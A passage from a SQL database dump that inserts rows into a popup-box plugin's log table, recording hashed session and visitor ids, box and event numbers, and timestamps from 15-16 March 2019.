(70421, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:25:19'),
(70422, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 20:25:40'),
(70423, '14e5fb7a5ad180eef764dfa75584060d', '7ffba4677245886f', 0, 2, 1, '2019-03-15 20:26:49'),
(70424, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 20:27:03'),
(70425, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:27:20'),
(70426, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:27:29'),
(70427, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 20:28:29'),
(70428, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:28:32'),
(70429, '77fcc9d858e5b4973db9520c9e264809', '407198c79af506a8', 0, 2, 1, '2019-03-15 20:29:26'),
(70430, 'f4c4f3de632fb1a9789dbfebe75ac7a9', 'dc34e7020b4cb232', 0, 2, 1, '2019-03-15 20:29:56'),
(70431, 'f4c4f3de632fb1a9789dbfebe75ac7a9', 'dc34e7020b4cb232', 0, 2, 1, '2019-03-15 20:30:23'),
(70432, 'b2a134d90985ce49781aab6379ce1c26', '37dedc117a94d375', 0, 2, 1, '2019-03-15 20:31:15'),
(70433, 'b2a134d90985ce49781aab6379ce1c26', '37dedc117a94d375', 0, 2, 1, '2019-03-15 20:32:04'),
(70434, 'f4c4f3de632fb1a9789dbfebe75ac7a9', 'dc34e7020b4cb232', 0, 2, 1, '2019-03-15 20:34:59'),
(70435, '16d2548f1442c5903a3dab0236dd0464', 'edfe950d47379572', 0, 2, 1, '2019-03-15 20:40:13'),
(70436, '58bac8bad0631260694fc3885841085f', '2ded06a867380e68', 0, 2, 1, '2019-03-15 20:40:26'),
(70437, '58bac8bad0631260694fc3885841085f', '2ded06a867380e68', 0, 2, 1, '2019-03-15 20:40:58'),
(70438, '2352c3634d9600770d941de16984731a', '8ba4cc26b18f2711', 0, 2, 1, '2019-03-15 20:43:17'),
(70439, '3e6a1c812d0602640076303a895e52f2', '320bf2e21f88f143', 0, 2, 1, '2019-03-15 20:50:58'),
(70440, 'fd9e5315366985a59fb9a23a49d25bc8', '5b6f49ae403da8d8', 0, 2, 1, '2019-03-15 21:00:38'),
(70441, 'fd9e5315366985a59fb9a23a49d25bc8', '5b6f49ae403da8d8', 0, 2, 1, '2019-03-15 21:00:42'),
(70442, '848dd411bdb4ad821a19e7bd5e66e188', '60fe507c41e14ac3', 0, 2, 1, '2019-03-15 21:01:31'),
(70443, '7ca717f6308b584e40d7a2c20c248fa2', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 21:09:58'),
(70444, '7ca717f6308b584e40d7a2c20c248fa2', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 21:10:11'),
(70445, '3e6a1c812d0602640076303a895e52f2', '320bf2e21f88f143', 0, 2, 1, '2019-03-15 21:20:24'),
(70446, '5a1b02b4779e4b4fa0288da0f5d8ef8c', 'e5ecd636c4d9a54c', 0, 2, 1, '2019-03-15 21:32:05'),
(70447, 'cae8a2b06967532f77baca92970d1725', 'da070c6b1c3611ae', 0, 2, 1, '2019-03-15 21:51:08'),
(70448, 'fd9e5315366985a59fb9a23a49d25bc8', '5b6f49ae403da8d8', 0, 2, 1, '2019-03-15 21:56:44'),
(70449, 'bf40dfb0ed9b0fc437acfb4e3ec02aea', 'a2400ad07ed14890', 0, 2, 1, '2019-03-15 21:57:31'),
(70450, 'bf40dfb0ed9b0fc437acfb4e3ec02aea', 'a2400ad07ed14890', 0, 2, 1, '2019-03-15 21:58:02'),
(70451, '1136b8e0099497e7985844ae1266b6df', 'f3f3de8bf97f7b07', 0, 2, 1, '2019-03-15 22:28:11'),
(70452, '1136b8e0099497e7985844ae1266b6df', 'f3f3de8bf97f7b07', 0, 2, 1, '2019-03-15 22:31:47'),
(70453, '03d860e35a8221e055c3a950f24a0306', '09efcb8d7bf145dc', 0, 2, 1, '2019-03-15 22:38:26'),
(70454, 'a188979806f2d7591005719b50b13716', '44766200a8cfe860', 0, 2, 1, '2019-03-15 22:39:24'),
(70455, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-15 22:51:07'),
(70456, '8612cd4a3d0fa315b00a83eb278b39a6', '378aada0693e18a9', 0, 2, 1, '2019-03-15 22:58:38'),
(70457, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-15 23:43:52'),
(70458, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-15 23:44:01'),
(70459, '92a99adad3c1b67de2df4f196aceecb6', '3de88ff4581dab27', 0, 2, 1, '2019-03-15 23:59:28'),
(70460, '92a99adad3c1b67de2df4f196aceecb6', '3de88ff4581dab27', 0, 2, 1, '2019-03-16 00:01:17'),
(70461, '68cf58492e98192ace8f3296762bd394', '157a02446fde20d8', 0, 2, 1, '2019-03-16 01:01:18'),
(70462, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:46:45'),
(70463, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:47:07'),
(70464, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:47:29'),
(70465, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:47:50'),
(70466, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:48:30'),
(70467, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:48:55'),
(70468, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:48:58'),
(70469, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:49:24'),
(70470, 'eacf07b78f41ef08edf23b17428c35a8', 'a38f4ee289e095be', 0, 2, 1, '2019-03-16 01:49:26'),
(70471, '7d6209518d409dae14ecb6164d53a32f', 'bf0a1cb804ec9c32', 0, 2, 1, '2019-03-16 02:28:08'),
(70472, 'aad7988f770560235dd92d15a04eccbd', '65bae380b109f550', 0, 2, 1, '2019-03-16 02:56:32'),
(70473, '4af402b807278b4ba6cb39188a5127f7', 'a61d2493c6bae045', 0, 2, 1, '2019-03-16 03:18:45'),
(70474, '4482067204dfeccf545b53022ab10f02', '00266cd1c6cf0f2f', 0, 2, 1, '2019-03-16 03:25:58'),
(70475, 'c2c5ec0ef88c120ab660ca340cdae160', 'e1f264c5bc1e8406', 0, 2, 1, '2019-03-16 04:09:10'),
(70476, '82c67341fd0f8fb6f24da2a0cd92c939', '585835667d3868c6', 0, 2, 1, '2019-03-16 05:45:26'),
(70477, 'b613bd7e929cab6303da7267879c0980', '3affdb6d237dd814', 0, 2, 1, '2019-03-16 05:46:04'),
(70478, '9796c8c0df75cd8c3b06d9cb3f7f7168', 'e5ecd636c4d9a54c', 0, 2, 1, '2019-03-16 05:48:40'),
(70479, 'ce0f44826d4f6ff09a2c0a433312ba78', '6f62c08c3e2a8304', 0, 2, 1, '2019-03-16 05:53:15'),
(70480, '963a2f1edbb73a6599dda26d97adbf9a', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-16 05:56:06'),
(70481, '2fb05c089cb32a8bdfd6af67cc57c12a', 'bc3b9c082c7deb9c', 0, 2, 1, '2019-03-16 05:56:31'),
(70482, '963a2f1edbb73a6599dda26d97adbf9a', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-16 05:56:51'),
(70483, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 05:57:04'),
(70484, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 05:58:17'),
(70485, '5901e91dd4d5059d9dc61fb47021bc2e', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 06:04:27'),
(70486, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 06:05:45'),
(70487, '5901e91dd4d5059d9dc61fb47021bc2e', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 06:06:01'),
(70488, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 06:06:03'),
(70489, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 06:08:28'),
(70490, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-16 06:10:27'),
(70491, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 06:10:37'),
(70492, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 06:19:51'),
(70493, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 06:19:53'),
(70494, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:23:48'),
(70495, '4800d015288e0c89f10864d086652616', 'bbc9866411ee9a1c', 0, 2, 1, '2019-03-16 06:24:12'),
(70496, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-16 06:26:32'),
(70497, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 06:26:33'),
(70498, '1a4087445aad68538cbc7f347c039df6', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-16 06:27:42'),
(70499, '1a4087445aad68538cbc7f347c039df6', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-16 06:31:51'),
(70500, '1a4087445aad68538cbc7f347c039df6', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-16 06:32:12'),
(70501, '871036a56c9d1bfcb67e109487914278', '624d6937076d1188', 0, 2, 1, '2019-03-16 06:33:48'),
(70502, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 06:34:03'),
(70503, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:35:02'),
(70504, 'be36d0e68111aeb9309cbdb8905bcba8', 'bdd5f14db608e011', 0, 2, 1, '2019-03-16 06:36:17'),
(70505, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 06:37:52'),
(70506, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-16 06:40:10'),
(70507, '871036a56c9d1bfcb67e109487914278', '624d6937076d1188', 0, 2, 1, '2019-03-16 06:40:34'),
(70508, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 06:41:01'),
(70509, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2019-03-16 06:42:06'),
(70510, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 06:42:12'),
(70511, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2019-03-16 06:42:25'),
(70512, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 06:42:48'),
(70513, '3e6a1c812d0602640076303a895e52f2', '320bf2e21f88f143', 0, 2, 1, '2019-03-16 06:42:55'),
(70514, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 06:44:48'),
(70515, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:45:45'),
(70516, '5b1d894ccc0d05c3a95892b5c94d5d38', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 06:46:11'),
(70517, '5b1d894ccc0d05c3a95892b5c94d5d38', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 06:46:24'),
(70518, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 06:46:54'),
(70519, '95c574672adde07ba1af7df9e89c3350', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-16 06:47:27'),
(70520, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:47:32'),
(70521, '225be9ed0700aedb499205b7bbedf3b3', '00bc277736589866', 0, 2, 1, '2019-03-16 06:52:27'),
(70522, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:56:06'),
(70523, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:56:20'),
(70524, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-16 06:57:56'),
(70525, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 06:58:30'),
(70526, '1a4087445aad68538cbc7f347c039df6', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-16 06:58:34'),
(70527, '1a4087445aad68538cbc7f347c039df6', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-16 06:58:48'),
(70528, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 06:58:54'),
(70529, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 06:59:57'),
(70530, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:00:23'),
(70531, '95c574672adde07ba1af7df9e89c3350', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-16 07:00:24'),
(70532, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:00:53'),
(70533, '198dfde11d666aa83607f880b8d13281', 'f3aaef808802b2c1', 0, 2, 1, '2019-03-16 07:01:15'),
(70534, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-16 07:02:12'),
(70535, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:02:29'),
(70536, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:02:48'),
(70537, '87228c271bdb220876fac75b58653bb8', 'd38cc91fa3f0e98a', 0, 2, 1, '2019-03-16 07:03:33'),
(70538, 'be36d0e68111aeb9309cbdb8905bcba8', 'bdd5f14db608e011', 0, 2, 1, '2019-03-16 07:05:23'),
(70539, 'e1ae114d4fcb634e7dd5d1241e7e1309', '3f59a813696b523b', 0, 2, 1, '2019-03-16 07:05:23'),
(70540, 'e1ae114d4fcb634e7dd5d1241e7e1309', '3f59a813696b523b', 0, 2, 1, '2019-03-16 07:05:36'),
(70541, '95c574672adde07ba1af7df9e89c3350', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-16 07:06:15'),
(70542, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:06:19'),
(70543, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-16 07:06:37'),
(70544, '95c574672adde07ba1af7df9e89c3350', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-16 07:06:56'),
(70545, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:07:31'),
(70546, '0a8ccefc87a31d9e94a8636a730aa819', 'd7036fef56eff751', 0, 2, 1, '2019-03-16 07:07:50'),
(70547, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:08:11'),
(70548, '3b15554ae0e301ee14d0157960d1998a', '91d3688e197526d0', 0, 2, 1, '2019-03-16 07:08:22'),
(70549, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:08:29'),
(70550, 'be36d0e68111aeb9309cbdb8905bcba8', 'bdd5f14db608e011', 0, 2, 1, '2019-03-16 07:08:58'),
(70551, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:08:59'),
(70552, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:09:09'),
(70553, '3b15554ae0e301ee14d0157960d1998a', '91d3688e197526d0', 0, 2, 1, '2019-03-16 07:09:28'),
(70554, '3b15554ae0e301ee14d0157960d1998a', '91d3688e197526d0', 0, 2, 1, '2019-03-16 07:10:07'),
(70555, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:10:59'),
(70556, '0a7a2ed56bacc9872bec3e4d340098a9', 'e3163f1046dc4449', 0, 2, 1, '2019-03-16 07:11:52'),
(70557, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:12:25'),
(70558, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:12:43'),
(70559, '433bcaf95cd16c55172f9af9ad624539', '22f43a16a511f701', 0, 2, 1, '2019-03-16 07:13:27'),
(70560, '0a7a2ed56bacc9872bec3e4d340098a9', 'e3163f1046dc4449', 0, 2, 1, '2019-03-16 07:13:39'),
(70561, '433bcaf95cd16c55172f9af9ad624539', '22f43a16a511f701', 0, 2, 1, '2019-03-16 07:13:43'),
(70562, 'e664d147202327bd8ed320c96a6b6928', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-16 07:13:45'),
(70563, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-16 07:14:37'),
(70564, 'f87c36d9bd14f64c34c8737fdf7012fd', '9009d093e7cf0f30', 0, 2, 1, '2019-03-16 07:16:42'),
(70565, '7e1a37dd6a8f6c7a35b07e11daedaa8a', '27d3b62cdd82d36e', 0, 2, 1, '2019-03-16 07:17:45'),
(70566, 'f0f6d83204da88c08807d869379a9f81', 'c96da3a2825c09af', 0, 2, 1, '2019-03-16 07:21:18'),
(70567, '77fcc9d858e5b4973db9520c9e264809', '407198c79af506a8', 0, 2, 1, '2019-03-16 07:25:43'),
(70568, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-16 07:26:33'),
(70569, '433bcaf95cd16c55172f9af9ad624539', '22f43a16a511f701', 0, 2, 1, '2019-03-16 07:27:12'),
(70570, '77fcc9d858e5b4973db9520c9e264809', '407198c79af506a8', 0, 2, 1, '2019-03-16 07:28:02'),
(70571, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-16 07:28:04'),
(70572, '802163ba97e05daec34ba8ce48bd221c', '4bd56efb62d514dd', 0, 2, 1, '2019-03-16 07:28:22'),
(70573, '00b20054e045fab6a8304cc4d549ff8a', '74e4cd40040f72b5', 0, 2, 1, '2019-03-16 07:28:33'),
(70574, '802163ba97e05daec34ba8ce48bd221c', '4bd56efb62d514dd', 0, 2, 1, '2019-03-16 07:28:55'),
(70575, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:29:43'),
(70576, 'a31e9003c9b2924ab017b21ae136c9ba', '801bbc3399e37d8a', 0, 2, 1, '2019-03-16 07:29:47'),
(70577, '802163ba97e05daec34ba8ce48bd221c', '4bd56efb62d514dd', 0, 2, 1, '2019-03-16 07:30:17');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(70578, '802163ba97e05daec34ba8ce48bd221c', '4bd56efb62d514dd', 0, 2, 1, '2019-03-16 07:30:23'),
(70579, '77fcc9d858e5b4973db9520c9e264809', '407198c79af506a8', 0, 2, 1, '2019-03-16 07:30:38'),
(70580, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 07:30:44'),
(70581, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 07:31:22'),
(70582, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:31:27'),
(70583, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:31:35'),
(70584, '6f0c07d21246f52708f00871b7375220', 'a811f042baa8c816', 0, 2, 1, '2019-03-16 07:31:46'),
(70585, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-16 07:32:02'),
(70586, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:32:09'),
(70587, '7e1a37dd6a8f6c7a35b07e11daedaa8a', '27d3b62cdd82d36e', 0, 2, 1, '2019-03-16 07:32:10'),
(70588, '5851d8e16ae368af1883b715a008e6a2', 'dba586f99a089544', 0, 2, 1, '2019-03-16 07:32:34'),
(70589, '2f8d2820c206990b6937a29a0d40b936', 'ba4f1299bbfe7d43', 0, 2, 1, '2019-03-16 07:33:15'),
(70590, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-03-16 07:33:16'),
(70591, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:34:34'),
(70592, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 07:35:14'),
(70593, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-16 07:37:14'),
(70594, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-16 07:37:18'),
(70595, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 07:37:47'),
(70596, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 07:37:58'),
(70597, '610bf051da29ec53ff24944b44ba843d', 'f1cc58f5bed0811c', 0, 2, 1, '2019-03-16 07:39:02'),
(70598, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 07:40:02'),
(70599, '0eff4246301e41235c3fb0754b74334d', 'cb7879013d3a4a34', 0, 2, 1, '2019-03-16 07:40:07'),
(70600, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:40:59'),
(70601, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 07:41:56'),
(70602, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 07:42:01'),
(70603, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 07:43:24'),
(70604, '8e71b3021c941369322c67568e76e0e0', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 07:43:56'),
(70605, '77fcc9d858e5b4973db9520c9e264809', '407198c79af506a8', 0, 2, 1, '2019-03-16 07:44:08'),
(70606, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 07:44:17'),
(70607, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 07:45:13'),
(70608, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 07:45:14'),
(70609, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 07:45:24'),
(70610, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-16 07:46:56'),
(70611, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 07:51:17'),
(70612, 'a4e31dda68bf76ab3ebf924ff00d4cfa', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-16 07:52:50'),
(70613, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 07:52:54'),
(70614, 'a4e31dda68bf76ab3ebf924ff00d4cfa', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-16 07:53:14'),
(70615, '5d585d25e906487463198d17ebac6588', '13e1e72a52babfbf', 0, 2, 1, '2019-03-16 07:53:46'),
(70616, '661587016dd893ae00cc5e52eea984b8', '6455f045eb28d63c', 0, 2, 1, '2019-03-16 07:56:55'),
(70617, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 07:58:21'),
(70618, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 07:58:36'),
(70619, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 07:58:46'),
(70620, '8f253e8f99954bfa34a16688ee87f031', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 07:59:02'),
(70621, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 07:59:37'),
(70622, 'a94d49d674ef8f99846ad025dd0ae70a', 'cc2105dbd92b227a', 0, 2, 1, '2019-03-16 07:59:46'),
(70623, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 08:00:54'),
(70624, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 08:01:26'),
(70625, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 08:02:39'),
(70626, '433bcaf95cd16c55172f9af9ad624539', '22f43a16a511f701', 0, 2, 1, '2019-03-16 08:04:49'),
(70627, '433bcaf95cd16c55172f9af9ad624539', '22f43a16a511f701', 0, 2, 1, '2019-03-16 08:05:05'),
(70628, '421548a0b9d8b50e90509115d4d0a3a1', '44451e386b316e7c', 0, 2, 1, '2019-03-16 08:10:12'),
(70629, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-16 08:10:17'),
(70630, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 08:10:45'),
(70631, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 08:11:23'),
(70632, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 08:13:11'),
(70633, '78808d8cf4bddbd1732a7eb90d3f258f', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 08:14:31'),
(70634, 'cf1acc93532b4c4a65af899fe61dea52', '0b0e4434613fb55a', 0, 2, 1, '2019-03-16 08:14:52'),
(70635, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 08:15:24'),
(70636, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-16 08:15:55'),
(70637, '873200ec7ebe22dd23fc46e6c0f1143c', '9d68b2926963e8e5', 0, 2, 1, '2019-03-16 08:22:07'),
(70638, '00b20054e045fab6a8304cc4d549ff8a', '74e4cd40040f72b5', 0, 2, 1, '2019-03-16 08:22:12'),
(70639, '8d68bf992872a431de9d649b211a3415', '7501b42c35accff7', 0, 2, 1, '2019-03-16 08:22:56'),
(70640, 'fb1912d0a037a6a1092322982adcbbbd', '7ffba4677245886f', 0, 2, 1, '2019-03-16 08:25:40'),
(70641, 'f5386fd2bc7fbf76484409c2b0c6b606', '135f23c8a85974ba', 0, 2, 1, '2019-03-16 08:26:28'),
(70642, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-16 08:28:52'),
(70643, '1a77d0da3f3fe28d44a075769bb137c9', 'ed721eb43caa7973', 0, 2, 1, '2019-03-16 08:30:42'),
(70644, '888bdea3ca89602b7cde71a71dc333ed', '7ffba4677245886f', 0, 2, 1, '2019-03-16 08:39:25'),
(70645, '04c90f855c3bda06266273e32d7587fc', 'edfe950d47379572', 0, 2, 1, '2019-03-16 08:42:44'),
(70646, '04c90f855c3bda06266273e32d7587fc', 'edfe950d47379572', 0, 2, 1, '2019-03-16 08:42:49'),
(70647, 'db8dad13bb7781a03c56a57e7c5b068a', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 08:43:14'),
(70648, 'e664d147202327bd8ed320c96a6b6928', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-16 08:44:56'),
